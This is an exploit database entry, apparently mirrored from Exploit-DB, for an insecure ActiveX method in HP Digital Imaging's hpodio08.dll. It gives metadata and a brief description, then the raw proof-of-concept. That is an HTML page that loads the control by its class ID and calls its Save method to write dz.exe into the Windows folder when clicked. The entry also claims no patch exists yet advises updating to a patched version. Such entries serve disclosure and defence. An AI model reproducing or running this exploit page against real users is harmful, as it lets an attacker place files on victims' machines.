HP Digital Imaging (hpodio08.dll) Insecure Method Exploit

vendor:

HP Digital Imaging

by:

ThE g0bL!N

7.5

CVSS

HIGH

Insecure Method

CWE

Product Name: HP Digital Imaging

Affected Version From: All versions

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2

HP Digital Imaging (hpodio08.dll) Insecure Method Exploit

This exploit targets the hpodio08.dll file in HP Digital Imaging software. It allows an attacker to execute arbitrary code by creating a malicious object and saving a file on the victim's system. The exploit has been tested on Windows XP SP2.

Mitigation:

Update to the latest version of HP Digital Imaging software to patch this vulnerability. Additionally, restrict access to the vulnerable DLL file to prevent unauthorized execution.

Source

Exploit-DB raw data:

# Exploit Title: HP Digital Imaging (hpodio08.dll) Insecure Method Exploit 
# Author: ThE g0bL!N
# Version: All vesion 
# Tested on: Windows xp pack 2
# Code : <title>Exploited By : ThE g0bL!N </title> 
<BODY> 
<object id=dz classid="clsid:{697F5209-0494-11D6-A2B0-0060B0FBD872}"></object> 

<SCRIPT> 

function Do_it() 
{ 
File = "dz.exe" 
dz.Save(File) 
} 

</SCRIPT> 
<h3>HP Digital Imaging (hpodio08.dll) Insecure Method Exploit </h3> 
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> 
</body> 
</HTML>
## Note: Dz.exe Will be created In C:\WINDOWS\ :) 
## 01110010 01100001 01111010 01101001 01101011 01100001 00100000 I try To hate You but i can't